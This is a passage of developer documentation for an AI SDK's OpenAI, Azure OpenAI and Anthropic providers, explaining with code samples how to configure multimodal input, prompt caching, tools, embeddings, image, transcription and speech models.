logprobs: true,
},
},
});
const openaiMetadata = (await result.providerMetadata)?.openai;
const logprobs = openaiMetadata?.logprobs;
Image Support
The OpenAI Chat API supports image inputs for appropriate models. You can pass image files as part of the message content using the 'image' type:
const result = await generateText({
model: openai.chat('gpt-5'),
messages: [
{
role: 'user',
content: [
{
type: 'text',
text: 'Please describe the image.',
},
{
type: 'image',
image: fs.readFileSync('./data/image.png'),
},
],
},
],
});
The model will have access to the image and will respond to questions about it.
The image should be passed using the image field.
You can also pass the URL of an image.
{
type: 'image',
image: 'https://sample.edu/image.png',
}
PDF support
The OpenAI Chat API supports reading PDF files.
You can pass PDF files as part of the message content using the file type:
const result = await generateText({
model: openai.chat('gpt-5'),
messages: [
{
role: 'user',
content: [
{
type: 'text',
text: 'What is an embedding model?',
},
{
type: 'file',
data: fs.readFileSync('./data/ai.pdf'),
mediaType: 'application/pdf',
filename: 'ai.pdf', // optional
},
],
},
],
});
The model will have access to the contents of the PDF file and
respond to questions about it.
The PDF file should be passed using the data field,
and the mediaType should be set to 'application/pdf'.
You can also pass a file-id from the OpenAI Files API.
{
type: 'file',
data: 'file-8EFBcWHsQxZV7YGezBC1fq',
mediaType: 'application/pdf',
}
You can also pass the URL of a PDF.
{
type: 'file',
data: 'https://sample.edu/example.pdf',
mediaType: 'application/pdf',
filename: 'ai.pdf', // optional
}
Predicted Outputs
OpenAI supports predicted outputs for gpt-4o and gpt-4o-mini.
Predicted outputs help you reduce latency by allowing you to specify a base text that the model should modify.
You can enable predicted outputs by adding the prediction option to the providerOptions.openai object:
const existingCode = `...`; // the base text the model should modify
const result = streamText({
model: openai.chat('gpt-4o'),
messages: [
{
role: 'user',
content: 'Replace the Username property with an Email property.',
},
{
role: 'user',
content: existingCode,
},
],
providerOptions: {
openai: {
prediction: {
type: 'content',
content: existingCode,
},
},
},
});
OpenAI provides usage information for predicted outputs (acceptedPredictionTokens and rejectedPredictionTokens).
You can access it in the providerMetadata object.
const openaiMetadata = (await result.providerMetadata)?.openai;
const acceptedPredictionTokens = openaiMetadata?.acceptedPredictionTokens;
const rejectedPredictionTokens = openaiMetadata?.rejectedPredictionTokens;
Image Detail
You can use the openai provider option to set the image input detail to high, low, or auto:
const result = await generateText({
model: openai.chat('gpt-5'),
messages: [
{
role: 'user',
content: [
{ type: 'text', text: 'Describe the image in detail.' },
{
type: 'image',
image:
'https://github.com/vercel/ai/blob/main/examples/ai-core/data/comic-cat.png?raw=true',
// OpenAI specific options - image detail:
providerOptions: {
openai: { imageDetail: 'low' },
},
},
],
},
],
});
Distillation
OpenAI supports model distillation for some models.
If you want to store a generation for use in the distillation process, you can add the store option to the providerOptions.openai object.
This will save the generation to the OpenAI platform for later use in distillation.
import { openai } from '@ai-sdk/openai';
import { generateText } from 'ai';
import 'dotenv/config';
async function main() {
const { text, usage } = await generateText({
model: openai.chat('gpt-4o-mini'),
prompt: 'Who worked on the original macintosh?',
providerOptions: {
openai: {
store: true,
metadata: {
custom: 'value',
},
},
},
});
console.log(text);
console.log();
console.log('Usage:', usage);
}
main().catch(console.error);
Prompt Caching
OpenAI has introduced Prompt Caching for supported models
including gpt-4o and gpt-4o-mini.
- Prompt caching is automatically enabled for these models, when the prompt is 1024 tokens or longer. It does not need to be explicitly enabled.
- You can use response providerMetadata to access the number of prompt tokens that were a cache hit.
- Note that caching behavior is dependent on load on OpenAI's infrastructure. Prompt prefixes generally remain in the cache following 5-10 minutes of inactivity before they are evicted, but during off-peak periods they may persist for up to an hour.
import { openai } from '@ai-sdk/openai';
import { generateText } from 'ai';
const { text, usage, providerMetadata } = await generateText({
model: openai.chat('gpt-4o-mini'),
prompt: `A 1024-token or longer prompt...`,
});
console.log(`usage:`, {
...usage,
cachedPromptTokens: providerMetadata?.openai?.cachedPromptTokens,
});
To improve cache hit rates, you can manually control caching using the promptCacheKey option:
import { openai } from '@ai-sdk/openai';
import { generateText } from 'ai';
const { text, usage, providerMetadata } = await generateText({
model: openai.chat('gpt-5'),
prompt: `A 1024-token or longer prompt...`,
providerOptions: {
openai: {
promptCacheKey: 'my-custom-cache-key-123',
},
},
});
console.log(`usage:`, {
...usage,
cachedPromptTokens: providerMetadata?.openai?.cachedPromptTokens,
});
For GPT-5.1 models, you can enable extended prompt caching that keeps cached prefixes active for up to 24 hours:
import { openai } from '@ai-sdk/openai';
import { generateText } from 'ai';
const { text, usage, providerMetadata } = await generateText({
model: openai.chat('gpt-5.1'),
prompt: `A 1024-token or longer prompt...`,
providerOptions: {
openai: {
promptCacheKey: 'my-custom-cache-key-123',
promptCacheRetention: '24h', // Extended caching for GPT-5.1
},
},
});
console.log(`usage:`, {
...usage,
cachedPromptTokens: providerMetadata?.openai?.cachedPromptTokens,
});
Audio Input
With the gpt-4o-audio-preview model, you can pass audio files to the model.
import { openai } from '@ai-sdk/openai';
import { generateText } from 'ai';
import fs from 'node:fs';
const result = await generateText({
model: openai.chat('gpt-4o-audio-preview'),
messages: [
{
role: 'user',
content: [
{ type: 'text', text: 'What is the audio saying?' },
{
type: 'file',
mediaType: 'audio/mpeg',
data: fs.readFileSync('./data/galileo.mp3'),
},
],
},
],
});
Completion Models
You can create models that call the OpenAI completions API using the .completion() factory method.
The first argument is the model id.
Currently only gpt-3.5-turbo-instruct is supported.
const model = openai.completion('gpt-3.5-turbo-instruct');
OpenAI completion models also support some model-specific settings that are not part of the standard call settings. You can pass them in the providerOptions argument:
import { openai } from '@ai-sdk/openai';
import { generateText } from 'ai';
const result = await generateText({
model: openai.completion('gpt-3.5-turbo-instruct'),
prompt: 'Write a haiku about coding.',
providerOptions: {
openai: {
echo: true, // optional, echo the prompt in addition to the completion
logitBias: {
// optional likelihood for specific tokens
'50256': -100,
},
suffix: 'some text', // optional suffix that comes after a completion of inserted text
user: 'test-user', // optional unique user identifier
},
},
});
The following optional provider options are available for OpenAI completion models:
- echo boolean
  Echo back the prompt in addition to the completion.
- logitBias Record<number, number>
  Modifies the likelihood of specified tokens appearing in the completion. Accepts a JSON object that maps tokens (specified by their token ID in the GPT tokenizer) to an associated bias value from -100 to 100. You can use this tokenizer tool to convert text to token IDs. Mathematically, the bias is added to the logits generated by the model prior to sampling. The exact effect will vary per model, but values between -1 and 1 should decrease or increase likelihood of selection; values like -100 or 100 should result in a ban or exclusive selection of the relevant token. As an example, you can pass {"50256": -100} to prevent the <|endoftext|> token from being generated.
- logprobs boolean | number
  Return the log probabilities of the tokens. Including logprobs will increase the response size and can slow down response times. However, it can be useful to better understand how the model is behaving. Setting to true will return the log probabilities of the tokens that were generated. Setting to a number will return the log probabilities of the top n tokens that were generated.
- suffix string
  The suffix that comes after a completion of inserted text.
- user string
  A unique identifier representing your end-user, which can help OpenAI to monitor and detect abuse. Learn more.
Model Capabilities
| Model | Image Input | Audio Input | Object Generation | Tool Usage |
|---|---|---|---|---|
| gpt-5.4-pro | | | | |
| gpt-5.4 | | | | |
| gpt-5.4-mini | | | | |
| gpt-5.4-nano | | | | |
| gpt-5.3-chat-latest | | | | |
| gpt-5.2-pro | | | | |
| gpt-5.2-chat-latest | | | | |
| gpt-5.2 | | | | |
| gpt-5.1-codex-mini | | | | |
| gpt-5.1-codex | | | | |
| gpt-5.1-chat-latest | | | | |
| gpt-5.1 | | | | |
| gpt-5-pro | | | | |
| gpt-5 | | | | |
| gpt-5-mini | | | | |
| gpt-5-nano | | | | |
| gpt-5-codex | | | | |
| gpt-5-chat-latest | | | | |
| gpt-4.1 | | | | |
| gpt-4.1-mini | | | | |
| gpt-4.1-nano | | | | |
| gpt-4o | | | | |
| gpt-4o-mini | | | | |
Embedding Models
You can create models that call the OpenAI embeddings API
using the .textEmbedding() factory method.
const model = openai.textEmbedding('text-embedding-3-large');
OpenAI embedding models support several additional provider options. You can pass them as an options argument:
import { openai } from '@ai-sdk/openai';
import { embed } from 'ai';
const { embedding } = await embed({
model: openai.textEmbedding('text-embedding-3-large'),
value: 'sunny day at the beach',
providerOptions: {
openai: {
dimensions: 512, // optional, number of dimensions for the embedding
user: 'test-user', // optional unique user identifier
},
},
});
The following optional provider options are available for OpenAI embedding models:
- dimensions number
  The number of dimensions the resulting output embeddings should have. Only supported in text-embedding-3 and later models.
- user string
  A unique identifier representing your end-user, which can help OpenAI to monitor and detect abuse. Learn more.
Model Capabilities
| Model | Default Dimensions | Custom Dimensions |
|---|---|---|
| text-embedding-3-large | 3072 | |
| text-embedding-3-small | 1536 | |
| text-embedding-ada-002 | 1536 | |
Image Models
You can create models that call the OpenAI image generation API
using the .image() factory method.
const model = openai.image('dall-e-3');
Model Capabilities
| Model | Sizes |
|---|---|
| gpt-image-1.5 | 1024x1024, 1536x1024, 1024x1536 |
| gpt-image-1-mini | 1024x1024, 1536x1024, 1024x1536 |
| gpt-image-1 | 1024x1024, 1536x1024, 1024x1536 |
| dall-e-3 | 1024x1024, 1792x1024, 1024x1792 |
| dall-e-2 | 256x256, 512x512, 1024x1024 |
You can pass optional providerOptions to the image model. These options are model-dependent and subject to change by OpenAI. For example, the gpt-image-1 model supports the quality option:
const { image, providerMetadata } = await generateImage({
model: openai.image('gpt-image-1.5'),
prompt: 'A salamander at sunrise in a forest pond in the Seychelles.',
providerOptions: {
openai: { quality: 'high' },
},
});
For more on generateImage() see Image Generation.
OpenAI's image models return additional metadata in the response that can be
accessed via providerMetadata.openai. The following OpenAI-specific metadata
is available:
- images Array<object>
  Array of image-specific metadata. Each image object may contain:
  - revisedPrompt string - The revised prompt that was actually used to generate the image (OpenAI may modify your prompt for safety or clarity)
  - created number - The Unix timestamp (in seconds) of when the image was created
  - size string - The size of the generated image. One of 1024x1024, 1024x1536, or 1536x1024
  - quality string - The quality of the generated image. One of low, medium, or high
  - background string - The background parameter used for the image generation. Either transparent or opaque
  - outputFormat string - The output format of the generated image. One of png, webp, or jpeg
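For example, a minimal sketch of reading this metadata from the generateImage call above:
const meta = providerMetadata?.openai?.images?.[0];
console.log(meta?.revisedPrompt); // the prompt OpenAI actually used
console.log(meta?.size); // e.g. '1024x1024'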
For more information on the available OpenAI image model options, see the OpenAI API reference.
Transcription Models
You can create models that call the OpenAI transcription API
using the .transcription() factory method.
The first argument is the model id, e.g. whisper-1.
const model = openai.transcription('whisper-1');
You can also pass additional provider-specific options using the providerOptions argument. For example, supplying the input language in ISO-639-1 (e.g. en) format will improve accuracy and latency.
import { experimental_transcribe as transcribe } from 'ai';
import { openai } from '@ai-sdk/openai';
const result = await transcribe({
model: openai.transcription('whisper-1'),
audio: new Uint8Array([1, 2, 3, 4]),
providerOptions: { openai: { language: 'en' } },
});
To get word-level timestamps, specify the granularity:
import { experimental_transcribe as transcribe } from 'ai';
import { openai } from '@ai-sdk/openai';
const result = await transcribe({
model: openai.transcription('whisper-1'),
audio: new Uint8Array([1, 2, 3, 4]),
providerOptions: {
openai: {
timestampGranularities: ['word'], // use ['word', 'segment'] to keep both granularities
},
},
});
// Access word-level timestamps
console.log(result.segments); // Array of segments with startSecond/endSecond
The following provider options are available:
- timestampGranularities string[]
  The granularity of the timestamps in the transcription. Defaults to ['segment']. Possible values are ['word'], ['segment'], and ['word', 'segment']. Note: There is no additional latency for segment timestamps, but generating word timestamps incurs additional latency.
- language string
  The language of the input audio. Supplying the input language in ISO-639-1 format (e.g. 'en') will improve accuracy and latency. Optional.
- prompt string
  An optional text to guide the model's style or continue a previous audio segment. The prompt should match the audio language. Optional.
- temperature number
  The sampling temperature, between 0 and 1. Higher values like 0.8 will make the output more random, while lower values like 0.2 will make it more focused and deterministic. If set to 0, the model will use log probability to automatically increase the temperature until certain thresholds are hit. Defaults to 0. Optional.
- include string[]
  Additional information to include in the transcription response.
Model Capabilities
| Model | Transcription | Duration | Segments | Language |
|---|---|---|---|---|
| whisper-1 | | | | |
| gpt-4o-mini-transcribe | | | | |
| gpt-4o-transcribe | | | | |
Speech Models
You can create models that call the OpenAI speech API
using the .speech() factory method.
The first argument is the model id, e.g. tts-1.
const model = openai.speech('tts-1');
You can also pass additional provider-specific options using the providerOptions argument, as well as standard options such as the voice to use for the generated audio.
import { experimental_generateSpeech as generateSpeech } from 'ai';
import { openai } from '@ai-sdk/openai';
const result = await generateSpeech({
model: openai.speech('tts-1'),
text: 'Hello, world!',
voice: 'alloy', // standard option: select a voice
providerOptions: { openai: {} },
});
The following provider options are available:
- instructions string
  Control the voice of your generated audio with additional instructions, e.g. "Speak in a slow and steady tone". Does not work with tts-1 or tts-1-hd. Optional.
- response_format string
  The format to generate audio in. Supported formats are mp3, opus, aac, flac, wav, and pcm. Defaults to mp3. Optional.
- speed number
  The speed of the generated audio. Select a value from 0.25 to 4.0. Defaults to 1.0. Optional.
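For instance, a sketch combining these options with the gpt-4o-mini-tts model, which supports instructions (unlike tts-1 and tts-1-hd):
import { experimental_generateSpeech as generateSpeech } from 'ai';
import { openai } from '@ai-sdk/openai';
const result = await generateSpeech({
  model: openai.speech('gpt-4o-mini-tts'),
  text: 'Hello, world!',
  providerOptions: {
    openai: {
      instructions: 'Speak in a slow and steady tone',
      speed: 1.0,
    },
  },
});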
Model Capabilities
| Model | Instructions |
|---|---|
| tts-1 | |
| tts-1-hd | |
| gpt-4o-mini-tts | |
title: Azure OpenAI description: Learn how to use the Azure OpenAI provider for the AI SDK.
Azure OpenAI Provider
The Azure OpenAI provider contains language model support for the Azure OpenAI chat API.
Setup
The Azure OpenAI provider is available in the @ai-sdk/azure module. You can install it with
pnpm add @ai-sdk/azure
Provider Instance
You can import the default provider instance azure from @ai-sdk/azure:
import { azure } from '@ai-sdk/azure';
If you need a customized setup, you can import createAzure from @ai-sdk/azure and create a provider instance with your settings:
import { createAzure } from '@ai-sdk/azure';
const azure = createAzure({
resourceName: 'your-resource-name', // Azure resource name
apiKey: 'your-api-key',
});
You can use the following optional settings to customize the OpenAI provider instance:
- resourceName string
  Azure resource name. It defaults to the AZURE_RESOURCE_NAME environment variable. The resource name is used in the assembled URL: https://{resourceName}.openai.azure.com/openai/v1{path}. You can use baseURL instead to specify the URL prefix.
- apiKey string
  API key that is being sent using the api-key header. It defaults to the AZURE_API_KEY environment variable.
- apiVersion string
  Sets a custom api version. Defaults to v1.
- baseURL string
  Use a different URL prefix for API calls, e.g. to use proxy servers. Either this or resourceName can be used. When a baseURL is provided, the resourceName is ignored. With a baseURL, the resolved URL is {baseURL}/v1{path}.
- headers Record<string,string>
  Custom headers to include in the requests.
- fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>
  Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.
- useDeploymentBasedUrls boolean
  Use deployment-based URLs for API calls. Set to true to use the legacy deployment format: {baseURL}/deployments/{deploymentId}{path}?api-version={apiVersion} instead of {baseURL}/v1{path}?api-version={apiVersion}. Defaults to false. This option is useful for compatibility with certain Azure OpenAI models or deployments that require the legacy endpoint format.
Language Models
The Azure OpenAI provider instance is a function that you can invoke to create a language model:
const model = azure('your-deployment-name');
You need to pass your deployment name as the first argument.
Reasoning Models
Azure exposes the thinking of DeepSeek-R1 in the generated text using the <think> tag.
You can use the extractReasoningMiddleware to extract this reasoning and expose it as a reasoning property on the result:
import { azure } from '@ai-sdk/azure';
import { wrapLanguageModel, extractReasoningMiddleware } from 'ai';
const enhancedModel = wrapLanguageModel({
model: azure('your-deepseek-r1-deployment-name'),
middleware: extractReasoningMiddleware({ tagName: 'think' }),
});
You can then use that enhanced model in functions like generateText and streamText.
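For example, a minimal sketch of calling the wrapped model:
import { generateText } from 'ai';
const { text, reasoningText } = await generateText({
  model: enhancedModel,
  prompt: 'How many people will live in the world in 2040?',
});
console.log(reasoningText); // content extracted from the <think> tag
console.log(text); // the response with the <think> block removed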
Example
You can use OpenAI language models to generate text with the generateText function:
import { azure } from '@ai-sdk/azure';
import { generateText } from 'ai';
const { text } = await generateText({
model: azure('your-deployment-name'),
prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});
OpenAI language models can also be used in the streamText, generateObject, and streamObject functions
(see AI SDK Core).
Provider Options
When using OpenAI language models on Azure, you can configure provider-specific options using providerOptions.openai. More information on the available configuration options is on the OpenAI provider page.
const messages = [
{
role: 'user',
content: [
{
type: 'text',
text: 'What is the capital of the moon?',
},
{
type: 'image',
image: 'https://example.com/image.png',
providerOptions: {
openai: { imageDetail: 'low' },
},
},
],
},
];
const { text } = await generateText({
model: azure('your-deployment-name'),
messages,
providerOptions: {
openai: {
reasoningEffort: 'low',
},
},
});
Chat Models
Azure OpenAI chat models also support some model-specific settings that are not part of the standard call settings. You can pass them in the providerOptions argument:
import { azure } from '@ai-sdk/azure';
import { generateText } from 'ai';
const result = await generateText({
model: azure('your-deployment-name'),
prompt: 'Write a short story about a robot.',
providerOptions: {
openai: {
logitBias: {
// optional likelihood for specific tokens
'50256': -100,
},
user: 'test-user', // optional unique user identifier
},
},
});
The following optional provider options are available for OpenAI chat models:
- logitBias Record<number, number>
  Modifies the likelihood of specified tokens appearing in the completion. Accepts a JSON object that maps tokens (specified by their token ID in the GPT tokenizer) to an associated bias value from -100 to 100. You can use this tokenizer tool to convert text to token IDs. Mathematically, the bias is added to the logits generated by the model prior to sampling. The exact effect will vary per model, but values between -1 and 1 should decrease or increase likelihood of selection; values like -100 or 100 should result in a ban or exclusive selection of the relevant token. As an example, you can pass {"50256": -100} to prevent the token from being generated.
- logprobs boolean | number
  Return the log probabilities of the tokens. Including logprobs will increase the response size and can slow down response times. However, it can be useful to better understand how the model is behaving. Setting to true will return the log probabilities of the tokens that were generated. Setting to a number will return the log probabilities of the top n tokens that were generated.
- parallelToolCalls boolean
  Whether to enable parallel function calling during tool use. Defaults to true.
- user string
  A unique identifier representing your end-user, which can help OpenAI to monitor and detect abuse. Learn more.
Responses Models
You can use the Azure OpenAI responses API with the azure.responses(deploymentName) factory method.
const model = azure.responses('your-deployment-name');
Further configuration can be done using OpenAI provider options.
You can validate the provider options using the OpenAIResponsesProviderOptions type.
import { azure, OpenAIResponsesProviderOptions } from '@ai-sdk/azure';
import { generateText } from 'ai';
const result = await generateText({
model: azure.responses('your-deployment-name'),
providerOptions: {
openai: {
parallelToolCalls: false,
store: false,
user: 'user_123',
// ...
} satisfies OpenAIResponsesProviderOptions,
},
// ...
});
The following provider options are available:
- parallelToolCalls boolean
  Whether to use parallel tool calls. Defaults to true.
- store boolean
  Whether to store the generation. Defaults to true.
- metadata Record<string, string>
  Additional metadata to store with the generation.
- previousResponseId string
  The ID of the previous response. You can use it to continue a conversation. Defaults to undefined.
- instructions string
  Instructions for the model. They can be used to change the system or developer message when continuing a conversation using the previousResponseId option. Defaults to undefined.
- user string
  A unique identifier representing your end-user, which can help OpenAI to monitor and detect abuse. Defaults to undefined.
- reasoningEffort 'low' | 'medium' | 'high'
  Reasoning effort for reasoning models. Defaults to medium. If you use providerOptions to set the reasoningEffort option, this model setting will be ignored.
- strictJsonSchema boolean
  Whether to use strict JSON schema validation. Defaults to false.
The Azure OpenAI responses provider also returns provider-specific metadata:
const { providerMetadata } = await generateText({
model: azure.responses('your-deployment-name'),
prompt: 'Hello!', // any prompt; the metadata is returned alongside the result
});
const openaiMetadata = providerMetadata?.openai;
The following OpenAI-specific metadata is returned:
- responseId string
  The ID of the response. Can be used to continue a conversation.
- cachedPromptTokens number
  The number of prompt tokens that were a cache hit.
- reasoningTokens number
  The number of reasoning tokens that the model generated.
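Putting responseId and previousResponseId together, a sketch of continuing a conversation across two calls (the deployment name is a placeholder):
import { azure } from '@ai-sdk/azure';
import { generateText } from 'ai';
const first = await generateText({
  model: azure.responses('your-deployment-name'),
  prompt: 'Pick a random city.',
});
const followUp = await generateText({
  model: azure.responses('your-deployment-name'),
  prompt: 'What is that city known for?',
  providerOptions: {
    openai: {
      // continue from the stored response of the first call
      previousResponseId: String(first.providerMetadata?.openai?.responseId),
    },
  },
});
console.log(followUp.text);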
Web Search Tool
The Azure OpenAI responses API supports web search (preview) through the azure.tools.webSearchPreview tool.
const result = await generateText({
model: azure.responses('gpt-4.1-mini'),
prompt: 'What happened in San Francisco last week?',
tools: {
web_search_preview: azure.tools.webSearchPreview({
// optional configuration:
searchContextSize: 'low',
userLocation: {
type: 'approximate',
city: 'San Francisco',
region: 'California',
},
}),
},
// Force web search tool (optional):
toolChoice: { type: 'tool', toolName: 'web_search_preview' },
});
console.log(result.text);
// URL sources from the web search results
const sources = result.sources;
for (const source of sources) {
console.log('source:', source);
}
File Search Tool
The Azure OpenAI responses API supports file search through the azure.tools.fileSearch tool.
You can force the use of the file search tool by setting the toolChoice parameter to { type: 'tool', toolName: 'file_search' }.
const result = await generateText({
model: azure.responses('gpt-5'),
prompt: 'What does the document say about user authentication?',
tools: {
file_search: azure.tools.fileSearch({
// optional configuration:
vectorStoreIds: ['vs_123', 'vs_456'],
maxNumResults: 10,
ranking: {
ranker: 'auto',
},
}),
},
// Force file search tool:
toolChoice: { type: 'tool', toolName: 'file_search' },
});
Image Generation Tool
Azure OpenAI's Responses API supports multi-modal image generation as a provider-defined tool.
Availability is restricted to specific models (for example, gpt-5 variants).
You can use the image tool with generateText.
import { createAzure } from '@ai-sdk/azure';
import { generateText } from 'ai';
const azure = createAzure({
headers: {
'x-ms-oai-image-generation-deployment': 'gpt-image-1', // use your own image model deployment
},
});
const result = await generateText({
model: azure.responses('gpt-5'),
prompt:
'Generate an image of an echidna swimming across the Mozambique channel.',
tools: {
image_generation: azure.tools.imageGeneration({ outputFormat: 'png' }),
},
});
for (const toolResult of result.staticToolResults) {
if (toolResult.toolName === 'image_generation') {
const base64Image = toolResult.output.result;
}
}
Code Interpreter Tool
The Azure OpenAI responses API supports the code interpreter tool through the azure.tools.codeInterpreter tool. This allows models to write and execute Python code.
import { azure } from '@ai-sdk/azure';
import { generateText } from 'ai';
const result = await generateText({
model: azure.responses('gpt-5'),
prompt: 'Write and run Python code to calculate the factorial of 10',
tools: {
code_interpreter: azure.tools.codeInterpreter({
// optional configuration:
container: {
fileIds: ['assistant-123', 'assistant-456'], // optional file IDs to make available
},
}),
},
});
The code interpreter tool can be configured with:
- container: Either a container ID string or an object with fileIds to specify uploaded files that should be available to the code interpreter
PDF support
The Azure OpenAI Responses API supports reading PDF files.
You can pass PDF files as part of the message content using the file type:
const result = await generateText({
model: azure.responses('your-deployment-name'),
messages: [
{
role: 'user',
content: [
{
type: 'text',
text: 'What is an embedding model?',
},
{
type: 'file',
data: fs.readFileSync('./data/ai.pdf'),
mediaType: 'application/pdf',
filename: 'ai.pdf', // optional
},
],
},
],
});
The model will have access to the contents of the PDF file and
respond to questions about it.
The PDF file should be passed using the data field,
and the mediaType should be set to 'application/pdf'.
Completion Models
You can create models that call the completions API using the .completion() factory method.
The first argument is the model id.
Currently only gpt-35-turbo-instruct is supported.
const model = azure.completion('your-gpt-35-turbo-instruct-deployment');
OpenAI completion models also support some model-specific settings that are not part of the standard call settings. You can pass them in the providerOptions argument:
import { azure } from '@ai-sdk/azure';
import { generateText } from 'ai';
const result = await generateText({
model: azure.completion('your-gpt-35-turbo-instruct-deployment'),
prompt: 'Write a haiku about coding.',
providerOptions: {
openai: {
echo: true, // optional, echo the prompt in addition to the completion
logitBias: {
// optional likelihood for specific tokens
'50256': -100,
},
suffix: 'some text', // optional suffix that comes after a completion of inserted text
user: 'test-user', // optional unique user identifier
},
},
});
The following optional provider options are available for Azure OpenAI completion models:
- echo boolean
  Echo back the prompt in addition to the completion.
- logitBias Record<number, number>
  Modifies the likelihood of specified tokens appearing in the completion. Accepts a JSON object that maps tokens (specified by their token ID in the GPT tokenizer) to an associated bias value from -100 to 100. You can use this tokenizer tool to convert text to token IDs. Mathematically, the bias is added to the logits generated by the model prior to sampling. The exact effect will vary per model, but values between -1 and 1 should decrease or increase likelihood of selection; values like -100 or 100 should result in a ban or exclusive selection of the relevant token. As an example, you can pass {"50256": -100} to prevent the <|endoftext|> token from being generated.
- logprobs boolean | number
  Return the log probabilities of the tokens. Including logprobs will increase the response size and can slow down response times. However, it can be useful to better understand how the model is behaving. Setting to true will return the log probabilities of the tokens that were generated. Setting to a number will return the log probabilities of the top n tokens that were generated.
- suffix string
  The suffix that comes after a completion of inserted text.
- user string
  A unique identifier representing your end-user, which can help OpenAI to monitor and detect abuse. Learn more.
Embedding Models
You can create models that call the Azure OpenAI embeddings API
using the .textEmbedding() factory method.
const model = azure.textEmbedding('your-embedding-deployment');
Azure OpenAI embedding models support several additional settings. You can pass them as an options argument:
import { azure } from '@ai-sdk/azure';
import { embed } from 'ai';
const { embedding } = await embed({
model: azure.textEmbedding('your-embedding-deployment'),
value: 'sunny day at the beach',
providerOptions: {
openai: {
dimensions: 512, // optional, number of dimensions for the embedding
user: 'test-user', // optional unique user identifier
},
},
});
The following optional provider options are available for Azure OpenAI embedding models:
- dimensions number
  The number of dimensions the resulting output embeddings should have. Only supported in text-embedding-3 and later models.
- user string
  A unique identifier representing your end-user, which can help OpenAI to monitor and detect abuse. Learn more.
Image Models
You can create models that call the Azure OpenAI image generation API (DALL-E) using the .image() factory method. The first argument is your deployment name for the DALL-E model.
const model = azure.image('your-dalle-deployment-name');
Azure OpenAI image models support several additional settings. You can pass them as providerOptions.openai when generating the image:
await generateImage({
model: azure.image('your-dalle-deployment-name'),
prompt: 'A photorealistic image of a cat astronaut floating in space',
size: '1024x1024', // '1024x1024', '1792x1024', or '1024x1792' for DALL-E 3
providerOptions: {
openai: {
user: 'test-user', // optional unique user identifier
responseFormat: 'url', // 'url' or 'b64_json', defaults to 'url'
},
},
});
Example
You can use Azure OpenAI image models to generate images with the generateImage function:
import { azure } from '@ai-sdk/azure';
import { experimental_generateImage as generateImage } from 'ai';
const { image } = await generateImage({
model: azure.image('your-dalle-deployment-name'),
prompt: 'A photorealistic image of a cat astronaut floating in space',
size: '1024x1024', // '1024x1024', '1792x1024', or '1024x1792' for DALL-E 3
});
// image contains the URL or base64 data of the generated image
console.log(image);
Model Capabilities
Azure OpenAI supports DALL-E 2 and DALL-E 3 models through deployments. The capabilities depend on which model version your deployment is using:
| Model Version | Sizes |
|---|---|
| DALL-E 3 | 1024x1024, 1792x1024, 1024x1792 |
| DALL-E 2 | 256x256, 512x512, 1024x1024 |
Transcription Models
You can create models that call the Azure OpenAI transcription API using the .transcription() factory method.
The first argument is the model id e.g. whisper-1.
const model = azure.transcription('whisper-1');
Some Azure OpenAI transcription deployments require the legacy deployment-based endpoint format. You can enable it when creating the provider instance:
import { createAzure } from '@ai-sdk/azure';
const azure = createAzure({
useDeploymentBasedUrls: true,
apiVersion: '2025-04-01-preview',
});
When using useDeploymentBasedUrls, the default api-version is not valid; you must set it to 2025-04-01-preview or an earlier value.
You can also pass additional provider-specific options using the providerOptions argument. For example, supplying the input language in ISO-639-1 (e.g. en) format will improve accuracy and latency.
import { experimental_transcribe as transcribe } from 'ai';
import { azure } from '@ai-sdk/azure';
import { readFile } from 'fs/promises';
const result = await transcribe({
model: azure.transcription('whisper-1'),
audio: await readFile('audio.mp3'),
providerOptions: { openai: { language: 'en' } },
});
The following provider options are available:
- timestampGranularities string[]
  The granularity of the timestamps in the transcription. Defaults to ['segment']. Possible values are ['word'], ['segment'], and ['word', 'segment']. Note: There is no additional latency for segment timestamps, but generating word timestamps incurs additional latency.
- language string
  The language of the input audio. Supplying the input language in ISO-639-1 format (e.g. 'en') will improve accuracy and latency. Optional.
- prompt string
  An optional text to guide the model's style or continue a previous audio segment. The prompt should match the audio language. Optional.
- temperature number
  The sampling temperature, between 0 and 1. Higher values like 0.8 will make the output more random, while lower values like 0.2 will make it more focused and deterministic. If set to 0, the model will use log probability to automatically increase the temperature until certain thresholds are hit. Defaults to 0. Optional.
- include string[]
  Additional information to include in the transcription response.
Model Capabilities
| Model | Transcription | Duration | Segments | Language |
|---|---|---|---|---|
| whisper-1 | | | | |
| gpt-4o-mini-transcribe | | | | |
| gpt-4o-transcribe | | | | |
title: Anthropic description: Learn how to use the Anthropic provider for the AI SDK.
Anthropic Provider
The Anthropic provider contains language model support for the Anthropic Messages API.
Setup
The Anthropic provider is available in the @ai-sdk/anthropic module. You can install it with
pnpm add @ai-sdk/anthropic
Provider Instance
You can import the default provider instance anthropic from @ai-sdk/anthropic:
import { anthropic } from '@ai-sdk/anthropic';
If you need a customized setup, you can import createAnthropic from @ai-sdk/anthropic and create a provider instance with your settings:
import { createAnthropic } from '@ai-sdk/anthropic';
const anthropic = createAnthropic({
// custom settings
});
You can use the following optional settings to customize the Anthropic provider instance:
- baseURL string
  Use a different URL prefix for API calls, e.g. to use proxy servers. The default prefix is https://api.anthropic.com/v1.
- apiKey string
  API key that is being sent using the x-api-key header. It defaults to the ANTHROPIC_API_KEY environment variable.
- headers Record<string,string>
  Custom headers to include in the requests.
- fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>
  Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.
Language Models
You can create models that call the Anthropic Messages API using the provider instance.
The first argument is the model id, e.g. claude-3-haiku-20240307.
Some models have multi-modal capabilities.
const model = anthropic('claude-3-haiku-20240307');
You can use Anthropic language models to generate text with the generateText function:
import { anthropic } from '@ai-sdk/anthropic';
import { generateText } from 'ai';
const { text } = await generateText({
model: anthropic('claude-3-haiku-20240307'),
prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});
Anthropic language models can also be used in the streamText, generateObject, and streamObject functions
(see AI SDK Core).
The following optional provider options are available for Anthropic models:
- disableParallelToolUse boolean
  Optional. Disables the use of parallel tool calls. Defaults to false. When set to true, the model will only call one tool at a time instead of potentially calling multiple tools in parallel.
- sendReasoning boolean
  Optional. Include reasoning content in requests sent to the model. Defaults to true. If you are experiencing issues with the model handling requests involving reasoning content, you can set this to false to omit them from the request.
- effort "low" | "medium" | "high" | "xhigh" | "max"
